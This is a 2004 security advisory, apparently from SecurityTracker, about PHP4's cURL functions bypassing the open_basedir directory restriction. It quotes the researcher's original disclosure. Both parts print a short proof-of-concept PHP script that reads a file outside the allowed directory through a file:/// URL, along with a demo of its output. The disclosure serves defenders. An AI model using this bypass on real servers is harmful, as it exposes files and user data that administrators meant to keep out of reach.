PHP cURL Functions Let Scripts Byass the 'open_basedir' Directory Restrictions
|
SecurityTracker Alert ID: 1011984 |
SecurityTracker URL: http://securitytracker.com/id/1011984
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 28 2004
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): Only tested on PHP 4
|
Description:
A vulnerability was reported in PHP in the cURL functions. A script can bypass the 'open_basedir' directory setting.
FraMe from kernelpanik.org reported that a local user can invoke the cURL (libcurl) functions to bypass the 'open_basedir' restrictions in the 'php.ini' file and access files in other directories.
A demonstration exploit is provided:
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>
|
Impact:
A script can bypass the 'open_basedir' directory setting to access files on the target system.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.php.net/ (Links to External Site)
|
Cause:
Access control error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: PHP4 cURL functions bypass open_basedir
|
====================================================
Subject: PHP4 cURL functions bypass open_basedir
Author: frame at kernelpanik.org
Product: PHP4 compile with cURL (not tested in PHP5)
Vendor: PHP/Zend
Vendor URL: www.php.net
Tipe: Local
Risk: Low/Medium
=====================================================
PHP cURL functions bypass open_basedir
protection, so users can navigate through
filesystem.
For example, setting "open_basedir" in php.ini to
"/var/www/html" anybody can retrieve "/etc/parla"
using cURL functions.
== Proof of concept (curl.php)
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch);
echo $file
?>
== Demo
$ cat /etc/parla
don't read please!
$ links -dump http://localhost/curltest/curl.php
don't read please!
== Release Timeline
No release timeline.
--
FraMe <frame@kernelpanik.org>
http://www.kernelpanik.org
|
|